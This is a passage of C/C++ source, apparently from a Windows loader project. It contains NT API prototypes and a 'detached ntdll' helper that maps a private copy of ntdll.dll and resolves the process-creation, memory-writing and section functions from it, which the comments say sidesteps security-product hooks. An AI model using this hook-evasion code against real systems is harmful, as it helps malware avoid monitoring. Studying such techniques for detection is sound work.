This parameter can take 3571 | one of the following values: 3572 | 3573 | PAGE_READONLY 3574 | PAGE_READWRITE 3575 | PAGE_WRITECOPY 3576 | PAGE_EXECUTE 3577 | PAGE_EXECUTE_READ 3578 | PAGE_EXECUTE_READWRITE 3579 | PAGE_EXECUTE_WRITECOPY 3580 | 3581 | AllocationAttributes - The attributes for the section. This parameter must 3582 | be a combination of the following values: 3583 | 3584 | SEC_BASED 0x00200000 // Map section at same address in each process 3585 | SEC_NO_CHANGE 0x00400000 // Disable changes to protection of pages 3586 | SEC_IMAGE 0x01000000 // Map section as an image 3587 | SEC_VLM 0x02000000 // Map section in VLM region 3588 | SEC_RESERVE 0x04000000 // Reserve without allocating pagefile storage 3589 | SEC_COMMIT 0x08000000 // Commit pages; the default behavior 3590 | SEC_NOCACHE 0x10000000 // Mark pages as non-cacheable 3591 | 3592 | FileHandle - Identifies the file from which to create the section object. 3593 | The file must be opened with an access mode compatible with the protection 3594 | flags specified by the Protect parameter. If FileHandle is zero, 3595 | the function creates a section object of the specified size backed 3596 | by the paging file rather than by a named file in the file system. 
3597 | 3598 | --*/ 3599 | 3600 | 3601 | NTSYSAPI 3602 | NTSTATUS 3603 | NTAPI 3604 | NtCreateSection( 3605 | OUT PHANDLE SectionHandle, 3606 | IN ACCESS_MASK DesiredAccess, 3607 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3608 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 3609 | IN ULONG SectionPageProtection, 3610 | IN ULONG AllocationAttributes, 3611 | IN HANDLE FileHandle OPTIONAL 3612 | ); 3613 | 3614 | 3615 | NTSYSAPI 3616 | NTSTATUS 3617 | NTAPI 3618 | ZwCreateSection( 3619 | OUT PHANDLE SectionHandle, 3620 | IN ACCESS_MASK DesiredAccess, 3621 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3622 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 3623 | IN ULONG SectionPageProtection, 3624 | IN ULONG AllocationAttributes, 3625 | IN HANDLE FileHandle OPTIONAL 3626 | ); 3627 | 3628 | 3629 | NTSYSAPI 3630 | NTSTATUS 3631 | NTAPI 3632 | NtOpenSection ( 3633 | OUT PHANDLE SectionHandle, 3634 | IN ACCESS_MASK DesiredAccess, 3635 | IN POBJECT_ATTRIBUTES ObjectAttributes 3636 | ); 3637 | 3638 | 3639 | NTSYSAPI 3640 | NTSTATUS 3641 | NTAPI 3642 | ZwOpenSection ( 3643 | OUT PHANDLE SectionHandle, 3644 | IN ACCESS_MASK DesiredAccess, 3645 | IN POBJECT_ATTRIBUTES ObjectAttributes 3646 | ); 3647 | 3648 | 3649 | NTSYSAPI 3650 | NTSTATUS 3651 | NTAPI 3652 | NtMapViewOfSection ( 3653 | IN HANDLE SectionHandle, 3654 | IN HANDLE ProcessHandle, 3655 | IN OUT PVOID *BaseAddress, 3656 | IN ULONG ZeroBits, 3657 | IN ULONG CommitSize, 3658 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 3659 | IN OUT PULONG ViewSize, 3660 | IN SECTION_INHERIT InheritDisposition, 3661 | IN ULONG AllocationType, 3662 | IN ULONG Protect 3663 | ); 3664 | 3665 | 3666 | NTSYSAPI 3667 | NTSTATUS 3668 | NTAPI 3669 | ZwMapViewOfSection ( 3670 | IN HANDLE SectionHandle, 3671 | IN HANDLE ProcessHandle, 3672 | IN OUT PVOID *BaseAddress, 3673 | IN ULONG ZeroBits, 3674 | IN ULONG CommitSize, 3675 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 3676 | IN OUT PULONG ViewSize, 3677 | IN SECTION_INHERIT 
InheritDisposition, 3678 | IN ULONG AllocationType, 3679 | IN ULONG Protect 3680 | ); 3681 | 3682 | 3683 | NTSYSAPI 3684 | NTSTATUS 3685 | NTAPI 3686 | NtUnmapViewOfSection ( 3687 | IN HANDLE ProcessHandle, 3688 | IN PVOID BaseAddress 3689 | ); 3690 | 3691 | 3692 | NTSYSAPI 3693 | NTSTATUS 3694 | NTAPI 3695 | ZwUnmapViewOfSection ( 3696 | IN HANDLE ProcessHandle, 3697 | IN PVOID BaseAddress 3698 | ); 3699 | 3700 | 3701 | NTSYSAPI 3702 | NTSTATUS 3703 | NTAPI 3704 | NtExtendSection ( 3705 | IN HANDLE SectionHandle, 3706 | IN OUT PLARGE_INTEGER SectionSize 3707 | ); 3708 | 3709 | 3710 | NTSYSAPI 3711 | NTSTATUS 3712 | NTAPI 3713 | ZwExtendSection ( 3714 | IN HANDLE SectionHandle, 3715 | IN OUT PLARGE_INTEGER SectionSize 3716 | ); 3717 | 3718 | 3719 | NTSYSAPI 3720 | NTSTATUS 3721 | NTAPI 3722 | NtQuerySection ( 3723 | IN HANDLE SectionHandle, 3724 | IN SECTION_INFORMATION_CLASS SectionInformationClass, 3725 | OUT PVOID SectionInformation, 3726 | IN ULONG Length, 3727 | OUT PULONG ResultLength OPTIONAL 3728 | ); 3729 | 3730 | 3731 | NTSYSAPI 3732 | NTSTATUS 3733 | NTAPI 3734 | ZwQuerySection ( 3735 | IN HANDLE SectionHandle, 3736 | IN SECTION_INFORMATION_CLASS SectionInformationClass, 3737 | OUT PVOID SectionInformation, 3738 | IN ULONG Length, 3739 | OUT PULONG ResultLength OPTIONAL 3740 | ); 3741 | 3742 | 3743 | //----------------------------------------------------------------------------- 3744 | // Synchronization 3745 | 3746 | // 3747 | // Wait type 3748 | // 3749 | 3750 | typedef enum _WAIT_TYPE { 3751 | WaitAll, 3752 | WaitAny 3753 | } WAIT_TYPE; 3754 | 3755 | 3756 | NTSYSAPI 3757 | NTSTATUS 3758 | NTAPI 3759 | NtWaitForSingleObject ( 3760 | IN HANDLE Handle, 3761 | IN BOOLEAN Alertable, 3762 | IN PLARGE_INTEGER Timeout OPTIONAL 3763 | ); 3764 | 3765 | 3766 | NTSYSAPI 3767 | NTSTATUS 3768 | NTAPI 3769 | ZwWaitForSingleObject ( 3770 | IN HANDLE Handle, 3771 | IN BOOLEAN Alertable, 3772 | IN PLARGE_INTEGER Timeout OPTIONAL 3773 | ); 3774 | 3775 | 3776 | NTSYSAPI 
3777 | NTSTATUS 3778 | NTAPI 3779 | NtWaitForMultipleObjects ( 3780 | IN ULONG Count, 3781 | IN HANDLE Handle[], 3782 | IN WAIT_TYPE WaitType, 3783 | IN BOOLEAN Alertable, 3784 | IN PLARGE_INTEGER Timeout OPTIONAL 3785 | ); 3786 | 3787 | 3788 | NTSYSAPI 3789 | NTSTATUS 3790 | NTAPI 3791 | ZwWaitForMultipleObjects ( 3792 | IN ULONG Count, 3793 | IN HANDLE Handle[], 3794 | IN WAIT_TYPE WaitType, 3795 | IN BOOLEAN Alertable, 3796 | IN PLARGE_INTEGER Timeout OPTIONAL 3797 | ); 3798 | 3799 | 3800 | //----------------------------------------------------------------------------- 3801 | // Event support 3802 | 3803 | typedef enum _EVENT_INFORMATION_CLASS { 3804 | EventBasicInformation // = 0 3805 | } EVENT_INFORMATION_CLASS; 3806 | 3807 | typedef struct _EVENT_BASIC_INFORMATION { 3808 | EVENT_TYPE EventType; 3809 | LONG EventState; 3810 | } EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; 3811 | 3812 | // 3813 | // Event handling routines 3814 | // 3815 | 3816 | 3817 | NTSYSAPI 3818 | NTSTATUS 3819 | NTAPI 3820 | NtCreateEvent ( 3821 | OUT PHANDLE EventHandle, 3822 | IN ACCESS_MASK DesiredAccess, 3823 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3824 | IN EVENT_TYPE EventType, 3825 | IN BOOLEAN InitialState 3826 | ); 3827 | 3828 | 3829 | NTSYSAPI 3830 | NTSTATUS 3831 | NTAPI 3832 | ZwCreateEvent ( 3833 | OUT PHANDLE EventHandle, 3834 | IN ACCESS_MASK DesiredAccess, 3835 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3836 | IN EVENT_TYPE EventType, 3837 | IN BOOLEAN InitialState 3838 | ); 3839 | 3840 | 3841 | NTSYSAPI 3842 | NTSTATUS 3843 | NTAPI 3844 | NtClearEvent ( 3845 | IN HANDLE Handle 3846 | ); 3847 | 3848 | 3849 | NTSYSAPI 3850 | NTSTATUS 3851 | NTAPI 3852 | ZwClearEvent ( 3853 | IN HANDLE Handle 3854 | ); 3855 | 3856 | 3857 | NTSYSAPI 3858 | NTSTATUS 3859 | NTAPI 3860 | NtPulseEvent ( 3861 | IN HANDLE Handle, 3862 | OUT PLONG PreviousState OPTIONAL 3863 | ); 3864 | 3865 | 3866 | NTSYSAPI 3867 | NTSTATUS 3868 | NTAPI 3869 | ZwPulseEvent ( 3870 | IN 
HANDLE Handle, 3871 | OUT PLONG PreviousState OPTIONAL 3872 | ); 3873 | 3874 | 3875 | NTSYSAPI 3876 | NTSTATUS 3877 | NTAPI 3878 | NtResetEvent ( 3879 | IN HANDLE Handle, 3880 | OUT PLONG PreviousState OPTIONAL 3881 | ); 3882 | 3883 | 3884 | NTSYSAPI 3885 | NTSTATUS 3886 | NTAPI 3887 | ZwResetEvent ( 3888 | IN HANDLE Handle, 3889 | OUT PLONG PreviousState OPTIONAL 3890 | ); 3891 | 3892 | 3893 | NTSYSAPI 3894 | NTSTATUS 3895 | NTAPI 3896 | NtSetEvent ( 3897 | IN HANDLE Handle, 3898 | OUT PLONG PreviousState OPTIONAL 3899 | ); 3900 | 3901 | 3902 | NTSYSAPI 3903 | NTSTATUS 3904 | NTAPI 3905 | ZwSetEvent ( 3906 | IN HANDLE Handle, 3907 | OUT PLONG PreviousState OPTIONAL 3908 | ); 3909 | 3910 | 3911 | NTSYSAPI 3912 | NTSTATUS 3913 | NTAPI 3914 | NtOpenEvent ( 3915 | OUT PHANDLE EventHandle, 3916 | IN ACCESS_MASK DesiredAccess, 3917 | IN POBJECT_ATTRIBUTES ObjectAttributes 3918 | ); 3919 | 3920 | 3921 | NTSYSAPI 3922 | NTSTATUS 3923 | NTAPI 3924 | ZwOpenEvent ( 3925 | OUT PHANDLE EventHandle, 3926 | IN ACCESS_MASK DesiredAccess, 3927 | IN POBJECT_ATTRIBUTES ObjectAttributes 3928 | ); 3929 | 3930 | 3931 | NTSYSAPI 3932 | NTSTATUS 3933 | NTAPI 3934 | NtQueryEvent ( 3935 | IN HANDLE EventHandle, 3936 | IN EVENT_INFORMATION_CLASS EventInfoClass, 3937 | OUT PVOID EventInfo, 3938 | IN ULONG Length, 3939 | OUT PULONG ResultLength OPTIONAL 3940 | ); 3941 | 3942 | 3943 | NTSYSAPI 3944 | NTSTATUS 3945 | NTAPI 3946 | ZwQueryEvent ( 3947 | IN HANDLE EventHandle, 3948 | IN EVENT_INFORMATION_CLASS EventInfoClass, 3949 | OUT PVOID EventInfo, 3950 | IN ULONG Length, 3951 | OUT PULONG ResultLength OPTIONAL 3952 | ); 3953 | 3954 | 3955 | //----------------------------------------------------------------------------- 3956 | // Security descriptor functions 3957 | 3958 | NTSYSAPI 3959 | NTSTATUS 3960 | NTAPI 3961 | RtlCreateSecurityDescriptor ( 3962 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3963 | IN ULONG Revision 3964 | ); 3965 | 3966 | 3967 | NTSYSAPI 3968 | NTSTATUS 3969 | NTAPI 
3970 | RtlSetDaclSecurityDescriptor( 3971 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3972 | IN BOOLEAN DaclPresent, 3973 | IN PACL Dacl OPTIONAL, 3974 | IN BOOLEAN DaclDefaulted OPTIONAL 3975 | ); 3976 | 3977 | 3978 | NTSYSAPI 3979 | NTSTATUS 3980 | NTAPI 3981 | RtlSetOwnerSecurityDescriptor ( 3982 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3983 | IN PSID Owner OPTIONAL, 3984 | IN BOOLEAN OwnerDefaulted OPTIONAL 3985 | ); 3986 | 3987 | 3988 | NTSYSAPI 3989 | NTSTATUS 3990 | NTAPI 3991 | RtlAllocateAndInitializeSid( 3992 | IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, 3993 | IN UCHAR SubAuthorityCount, 3994 | IN ULONG SubAuthority0, 3995 | IN ULONG SubAuthority1, 3996 | IN ULONG SubAuthority2, 3997 | IN ULONG SubAuthority3, 3998 | IN ULONG SubAuthority4, 3999 | IN ULONG SubAuthority5, 4000 | IN ULONG SubAuthority6, 4001 | IN ULONG SubAuthority7, 4002 | OUT PSID *Sid 4003 | ); 4004 | 4005 | 4006 | NTSYSAPI 4007 | ULONG 4008 | NTAPI 4009 | RtlLengthSid ( 4010 | IN PSID Sid 4011 | ); 4012 | 4013 | 4014 | NTSYSAPI 4015 | BOOLEAN 4016 | NTAPI 4017 | RtlEqualSid ( 4018 | IN PSID Sid1, 4019 | IN PSID Sid2 4020 | ); 4021 | 4022 | 4023 | NTSYSAPI 4024 | PVOID 4025 | NTAPI 4026 | RtlFreeSid( 4027 | IN PSID Sid 4028 | ); 4029 | 4030 | 4031 | NTSYSAPI 4032 | NTSTATUS 4033 | NTAPI 4034 | RtlCreateAcl( 4035 | IN PACL Acl, 4036 | IN ULONG AclLength, 4037 | IN ULONG AclRevision 4038 | ); 4039 | 4040 | 4041 | NTSYSAPI 4042 | NTSTATUS 4043 | NTAPI 4044 | RtlAddAccessAllowedAce( 4045 | IN OUT PACL Acl, 4046 | IN ULONG AceRevision, 4047 | IN ACCESS_MASK AccessMask, 4048 | IN PSID Sid 4049 | ); 4050 | 4051 | 4052 | NTSYSAPI 4053 | NTSTATUS 4054 | NTAPI 4055 | RtlAddAccessAllowedAceEx( 4056 | IN OUT PACL Acl, 4057 | IN ULONG AceRevision, 4058 | IN ULONG AceFlags, 4059 | IN ULONG AccessMask, 4060 | IN PSID Sid 4061 | ); 4062 | 4063 | //----------------------------------------------------------------------------- 4064 | // Token functions 4065 | 4066 | NTSYSAPI 4067 | NTSTATUS 
4068 | NTAPI 4069 | NtOpenProcessToken( 4070 | IN HANDLE ProcessHandle, 4071 | IN ACCESS_MASK DesiredAccess, 4072 | OUT PHANDLE TokenHandle 4073 | ); 4074 | 4075 | 4076 | NTSYSAPI 4077 | NTSTATUS 4078 | NTAPI 4079 | NtOpenThreadToken( 4080 | IN HANDLE ThreadHandle, 4081 | IN ACCESS_MASK DesiredAccess, 4082 | IN BOOLEAN OpenAsSelf, 4083 | OUT PHANDLE TokenHandle 4084 | ); 4085 | 4086 | 4087 | NTSYSAPI 4088 | NTSTATUS 4089 | NTAPI 4090 | NtQueryInformationToken( 4091 | IN HANDLE TokenHandle, 4092 | IN TOKEN_INFORMATION_CLASS TokenInformationClass, 4093 | OUT PVOID TokenInformation, 4094 | IN ULONG TokenInformationLength, 4095 | OUT PULONG ReturnLength 4096 | ); 4097 | 4098 | 4099 | NTSYSAPI 4100 | NTSTATUS 4101 | NTAPI 4102 | NtSetInformationToken( 4103 | IN HANDLE TokenHandle, 4104 | IN TOKEN_INFORMATION_CLASS TokenInformationClass, 4105 | IN PVOID TokenInformation, 4106 | IN ULONG TokenInformationLength 4107 | ); 4108 | 4109 | 4110 | NTSYSAPI 4111 | NTSTATUS 4112 | NTAPI 4113 | NtAdjustPrivilegesToken( 4114 | IN HANDLE TokenHandle, 4115 | IN BOOLEAN DisableAllPrivileges, 4116 | IN PTOKEN_PRIVILEGES NewState OPTIONAL, 4117 | IN ULONG BufferLength OPTIONAL, 4118 | IN PTOKEN_PRIVILEGES PreviousState OPTIONAL, 4119 | OUT PULONG ReturnLength 4120 | ); 4121 | 4122 | 4123 | NTSYSAPI 4124 | NTSTATUS 4125 | NTAPI 4126 | NtDuplicateToken( 4127 | IN HANDLE ExistingTokenHandle, 4128 | IN ACCESS_MASK DesiredAccess, 4129 | IN POBJECT_ATTRIBUTES ObjectAttributes, 4130 | IN BOOLEAN EffectiveOnly, 4131 | IN TOKEN_TYPE TokenType, 4132 | OUT PHANDLE NewTokenHandle 4133 | ); 4134 | 4135 | 4136 | NTSYSAPI 4137 | NTSTATUS 4138 | NTAPI 4139 | NtCompareTokens( 4140 | IN HANDLE FirstTokenHandle, 4141 | IN HANDLE SecondTokenHandle, 4142 | OUT PBOOLEAN IdenticalTokens 4143 | ); 4144 | 4145 | 4146 | //----------------------------------------------------------------------------- 4147 | // Symbolic links 4148 | 4149 | // 4150 | // Object Manager Symbolic Link Specific Access Rights. 
4151 | // 4152 | 4153 | #ifndef SYMBOLIC_LINK_QUERY 4154 | #define SYMBOLIC_LINK_QUERY (0x0001) 4155 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 4156 | #endif 4157 | 4158 | NTSYSAPI 4159 | NTSTATUS 4160 | NTAPI 4161 | NtOpenSymbolicLinkObject ( 4162 | OUT PHANDLE SymbolicLinkHandle, 4163 | IN ACCESS_MASK DesiredAccess, 4164 | IN POBJECT_ATTRIBUTES ObjectAttributes 4165 | ); 4166 | 4167 | 4168 | NTSYSAPI 4169 | NTSTATUS 4170 | NTAPI 4171 | NtQuerySymbolicLinkObject ( 4172 | IN HANDLE SymbolicLinkHandle, 4173 | OUT PUNICODE_STRING NameString, 4174 | OUT PULONG ResultLength OPTIONAL 4175 | ); 4176 | 4177 | //----------------------------------------------------------------------------- 4178 | // Loader functions 4179 | 4180 | NTSYSAPI 4181 | NTSTATUS 4182 | NTAPI 4183 | LdrGetDllHandle( 4184 | IN PWSTR DllPath OPTIONAL, 4185 | IN PULONG DllCharacteristics OPTIONAL, 4186 | IN PUNICODE_STRING DllName, 4187 | OUT PVOID * DllHandle 4188 | ); 4189 | 4190 | 4191 | NTSYSAPI 4192 | NTSTATUS 4193 | NTAPI 4194 | LdrGetProcedureAddress( 4195 | IN PVOID DllHandle, 4196 | IN PANSI_STRING ProcedureName OPTIONAL, 4197 | IN ULONG ProcedureNumber OPTIONAL, 4198 | OUT PVOID *ProcedureAddress 4199 | ); 4200 | 4201 | 4202 | NTSYSAPI 4203 | NTSTATUS 4204 | NTAPI 4205 | LdrLoadDll( 4206 | IN PWSTR DllPath OPTIONAL, 4207 | IN PULONG DllCharacteristics OPTIONAL, 4208 | IN PUNICODE_STRING DllName, 4209 | OUT PVOID *DllHandle 4210 | ); 4211 | 4212 | NTSYSAPI 4213 | NTSTATUS 4214 | NTAPI 4215 | LdrFindEntryForAddress( 4216 | IN PVOID Address, 4217 | OUT PLDR_DATA_TABLE_ENTRY *Module 4218 | ); 4219 | 4220 | NTSYSAPI 4221 | VOID 4222 | NTAPI 4223 | RtlGetCallersAddress( 4224 | OUT PVOID *CallersAddress, 4225 | OUT PVOID *CallersCaller 4226 | ); 4227 | 4228 | //----------------------------------------------------------------------------- 4229 | // Functions dealing with NTSTATUS and Win32 error 4230 | 4231 | NTSYSAPI 4232 | ULONG 4233 | NTAPI 4234 | RtlNtStatusToDosError( 
4235 | NTSTATUS Status 4236 | ); 4237 | 4238 | 4239 | NTSYSAPI 4240 | ULONG 4241 | NTAPI 4242 | RtlNtStatusToDosErrorNoTeb( 4243 | NTSTATUS Status 4244 | ); 4245 | 4246 | 4247 | NTSYSAPI 4248 | NTSTATUS 4249 | NTAPI 4250 | RtlGetLastNtStatus( 4251 | ); 4252 | 4253 | 4254 | NTSYSAPI 4255 | ULONG 4256 | NTAPI 4257 | RtlGetLastWin32Error( 4258 | ); 4259 | 4260 | 4261 | NTSYSAPI 4262 | VOID 4263 | NTAPI 4264 | RtlSetLastWin32Error( 4265 | ULONG WinError 4266 | ); 4267 | 4268 | 4269 | NTSYSAPI 4270 | VOID 4271 | NTAPI 4272 | RtlSetLastWin32ErrorAndNtStatusFromNtStatus( 4273 | NTSTATUS Status 4274 | ); 4275 | 4276 | 4277 | //----------------------------------------------------------------------------- 4278 | // I/O functions 4279 | 4280 | 4281 | NTSYSAPI 4282 | NTSTATUS 4283 | NTAPI 4284 | NtDisplayString( 4285 | IN PUNICODE_STRING String 4286 | ); 4287 | 4288 | 4289 | #ifdef __cplusplus 4290 | } // extern "C" 4291 | #endif 4292 | 4293 | #endif // __NTDLL_H__ 4294 | -------------------------------------------------------------------------------- /basic_ldr/ntdll_detached.cpp: -------------------------------------------------------------------------------- 1 | #include "ntdll_detached.h" 2 | #include "peconv.h" 3 | 4 | NTSTATUS (NTAPI *ntdll_NtCreateProcessEx) 5 | ( 6 | OUT PHANDLE ProcessHandle, 7 | IN ACCESS_MASK DesiredAccess, 8 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 9 | IN HANDLE ParentProcess, 10 | IN ULONG Flags, 11 | IN HANDLE SectionHandle OPTIONAL, 12 | IN HANDLE DebugPort OPTIONAL, 13 | IN HANDLE ExceptionPort OPTIONAL, 14 | IN BOOLEAN InJob 15 | ) = NULL; 16 | 17 | NTSTATUS (NTAPI *ntdll_RtlCreateProcessParametersEx)( 18 | _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, 19 | _In_ PUNICODE_STRING ImagePathName, 20 | _In_opt_ PUNICODE_STRING DllPath, 21 | _In_opt_ PUNICODE_STRING CurrentDirectory, 22 | _In_opt_ PUNICODE_STRING CommandLine, 23 | _In_opt_ PVOID Environment, 24 | _In_opt_ PUNICODE_STRING WindowTitle, 25 | _In_opt_ PUNICODE_STRING 
DesktopInfo,
26 | _In_opt_ PUNICODE_STRING ShellInfo,
27 | _In_opt_ PUNICODE_STRING RuntimeData,
28 | _In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized
29 | ) = NULL;
30 |
// Remaining ntdll_* entry points used by the loader. Every one of them starts
// out NULL and is only filled in by init_ntdll_func() below, from the private
// ntdll image returned by load_ntdll(); none of them is resolved from the
// ntdll.dll that the OS loader mapped into this process.
31 | NTSTATUS (NTAPI *ntdll_NtCreateThreadEx) (
32 | OUT PHANDLE ThreadHandle,
33 | IN ACCESS_MASK DesiredAccess,
34 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
35 | IN HANDLE ProcessHandle,
36 | IN LPTHREAD_START_ROUTINE StartRoutine,
37 | IN PVOID Argument OPTIONAL,
38 | IN ULONG CreateFlags,
39 | IN ULONG_PTR ZeroBits,
40 | IN SIZE_T StackSize OPTIONAL,
41 | IN SIZE_T MaximumStackSize OPTIONAL,
42 | IN PVOID AttributeList OPTIONAL
43 | ) = NULL;
44 |
45 | NTSTATUS (NTAPI *ntdll_NtAllocateVirtualMemory)(
46 | _In_ HANDLE ProcessHandle,
47 | _Inout_ PVOID *BaseAddress,
48 | _In_ ULONG_PTR ZeroBits,
49 | _Inout_ PSIZE_T RegionSize,
50 | _In_ ULONG AllocationType,
51 | _In_ ULONG Protect
52 | ) = NULL;
53 |
54 | NTSTATUS (NTAPI *ntdll_NtWriteVirtualMemory)(
55 | IN HANDLE ProcessHandle,
56 | IN PVOID BaseAddress,
57 | IN PVOID Buffer,
58 | IN ULONG NumberOfBytesToWrite,
59 | OUT PULONG NumberOfBytesWritten OPTIONAL
60 | ) = NULL;
61 |
62 | NTSTATUS (NTAPI *ntdll_NtCreateSection) (
63 | OUT PHANDLE SectionHandle,
64 | IN ACCESS_MASK DesiredAccess,
65 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
66 | IN PLARGE_INTEGER MaximumSize OPTIONAL,
67 | IN ULONG SectionPageProtection,
68 | IN ULONG AllocationAttributes,
69 | IN HANDLE FileHandle OPTIONAL
70 | ) = NULL;
71 |
// Maps a second, private copy of ntdll.dll from %SystemRoot%\system32 into
// this process through peconv::load_pe_module (not LoadLibrary) and returns
// it as an HMODULE. v_size is filled in by peconv with the size of the mapped
// image. The two boolean arguments are passed straight through to peconv
// (presumably executable / relocate; confirm against libpeconv's signature).
// This private mapping is the "detached NTDLL" the README describes: exports
// resolved from it point at on-disk code, so the project's intent is to
// sidestep user-mode hooks installed in the system-loaded ntdll. For a
// defender the observable artifact is a second ntdll image in the process
// that the OS loader never registered.
// NOTE(review): the return value of ExpandEnvironmentStrings is not checked;
// on failure (0) or when the expansion needs more than MAX_PATH characters
// the buffer content is unreliable and load_pe_module is still attempted
// with it. A failed mapping is expected to yield NULL here, which
// init_ntdll_func() rejects.
72 | HMODULE load_ntdll(size_t &v_size)
73 | {
74 | CHAR ntdllPath[MAX_PATH];
75 | ExpandEnvironmentStrings("%SystemRoot%\\system32\\ntdll.dll", ntdllPath, MAX_PATH);
76 |
77 | HMODULE ntdll_module = (HMODULE) peconv::load_pe_module(ntdllPath, v_size, true, true);
78 | return ntdll_module;
79 | }
80 |
// Resolves the six exports this loader needs (NtCreateProcessEx,
// RtlCreateProcessParametersEx, NtCreateThreadEx, NtAllocateVirtualMemory,
// NtWriteVirtualMemory, NtCreateSection) from `lib` via
// peconv::get_exported_func and stores them in the ntdll_* pointers above.
// `lib` is meant to be the handle returned by load_ntdll(). Returns false if
// lib is NULL or any lookup fails. The lookups run in sequence with an early
// return, so on failure the pointers assigned before the failing lookup stay
// set while the later ones remain NULL; a false return must be treated as
// "none of them are usable".
81 | bool init_ntdll_func(HMODULE lib)
82 | {
83 | if (lib == nullptr) {
84 | return false;
85 | }
86 | FARPROC proc = peconv::get_exported_func(lib, "NtCreateProcessEx");
87 | if (proc ==
nullptr) { 88 | return false; 89 | } 90 | ntdll_NtCreateProcessEx = (NTSTATUS (NTAPI *)( 91 | PHANDLE, 92 | ACCESS_MASK, 93 | POBJECT_ATTRIBUTES, 94 | HANDLE, 95 | ULONG, 96 | HANDLE, 97 | HANDLE, 98 | HANDLE, 99 | BOOLEAN 100 | )) proc; 101 | 102 | proc = peconv::get_exported_func(lib, "RtlCreateProcessParametersEx"); 103 | if (proc == nullptr) { 104 | return false; 105 | } 106 | ntdll_RtlCreateProcessParametersEx = (NTSTATUS (NTAPI *)( 107 | PRTL_USER_PROCESS_PARAMETERS*, 108 | PUNICODE_STRING, 109 | PUNICODE_STRING, 110 | PUNICODE_STRING, 111 | PUNICODE_STRING, 112 | PVOID, 113 | PUNICODE_STRING, 114 | PUNICODE_STRING, 115 | PUNICODE_STRING, 116 | PUNICODE_STRING, 117 | ULONG 118 | )) proc; 119 | 120 | proc = peconv::get_exported_func(lib, "NtCreateThreadEx"); 121 | if (proc == nullptr) { 122 | return false; 123 | } 124 | ntdll_NtCreateThreadEx = (NTSTATUS (NTAPI *)( 125 | PHANDLE, 126 | ACCESS_MASK, 127 | POBJECT_ATTRIBUTES, 128 | HANDLE, 129 | LPTHREAD_START_ROUTINE, 130 | PVOID, 131 | ULONG, 132 | ULONG_PTR, 133 | SIZE_T, 134 | SIZE_T, 135 | PVOID 136 | )) proc; 137 | 138 | proc = peconv::get_exported_func(lib, "NtAllocateVirtualMemory"); 139 | if (proc == nullptr) { 140 | return false; 141 | } 142 | ntdll_NtAllocateVirtualMemory = (NTSTATUS (NTAPI *)( 143 | HANDLE, 144 | PVOID*, 145 | ULONG_PTR, 146 | PSIZE_T, 147 | ULONG, 148 | ULONG 149 | )) proc; 150 | 151 | proc = peconv::get_exported_func(lib, "NtWriteVirtualMemory"); 152 | if (proc == nullptr) { 153 | return false; 154 | } 155 | ntdll_NtWriteVirtualMemory = (NTSTATUS (NTAPI *)( 156 | HANDLE, //ProcessHandle 157 | PVOID, // BaseAddress 158 | PVOID, //Buffer 159 | ULONG, //NumberOfBytesToWrite 160 | PULONG //NumberOfBytesWritten OPTIONAL 161 | )) proc; 162 | 163 | proc = peconv::get_exported_func(lib, "NtCreateSection"); 164 | if (proc == nullptr) { 165 | return false; 166 | } 167 | ntdll_NtCreateSection = (NTSTATUS (NTAPI *)( 168 | PHANDLE , 169 | ACCESS_MASK, 170 | POBJECT_ATTRIBUTES, 171 | 
PLARGE_INTEGER,
    ULONG,
    ULONG,
    HANDLE
    )) proc;

    return true;
}

--------------------------------------------------------------------------------
/basic_ldr/ntdll_detached.h:
--------------------------------------------------------------------------------
#pragma once

#include  // NOTE(review): the header name was lost in this listing (an angle-bracket include) - confirm against the repository
#include "ntddk.h"
#include "ntdll_types.h"

// Pseudo-handles for the calling process / thread, as accepted by the NT API.
#define ntdll_NtCurrentProcess() ((HANDLE) -1)
#define ntdll_NtCurrentThread() ((HANDLE) -2)

//Functions:
// Pointers to NT API routines. They are presumably filled in by
// init_ntdll_func() (declared at the bottom of this header) from the ntdll
// image returned by load_ntdll(), i.e. not through the executable's import
// table - confirm in ntdll_detached.cpp.
// NOTE(review): because calls go through this separately mapped ntdll, inline
// hooks that a security product places on the process's regular ntdll are not
// on the call path; detecting what this sample does therefore has to rely on
// kernel-side telemetry (process / thread / section creation callbacks) rather
// than on userland hooks.

// Creates a process; the image comes from SectionHandle when one is given.
extern NTSTATUS (NTAPI *ntdll_NtCreateProcessEx)
(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ParentProcess,
    IN ULONG Flags,
    IN HANDLE SectionHandle OPTIONAL,
    IN HANDLE DebugPort OPTIONAL,
    IN HANDLE ExceptionPort OPTIONAL,
    IN BOOLEAN InJob
);

// Builds the RTL_USER_PROCESS_PARAMETERS block for a new process.
extern NTSTATUS (NTAPI *ntdll_RtlCreateProcessParametersEx)(
    _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
    _In_ PUNICODE_STRING ImagePathName,
    _In_opt_ PUNICODE_STRING DllPath,
    _In_opt_ PUNICODE_STRING CurrentDirectory,
    _In_opt_ PUNICODE_STRING CommandLine,
    _In_opt_ PVOID Environment,
    _In_opt_ PUNICODE_STRING WindowTitle,
    _In_opt_ PUNICODE_STRING DesktopInfo,
    _In_opt_ PUNICODE_STRING ShellInfo,
    _In_opt_ PUNICODE_STRING RuntimeData,
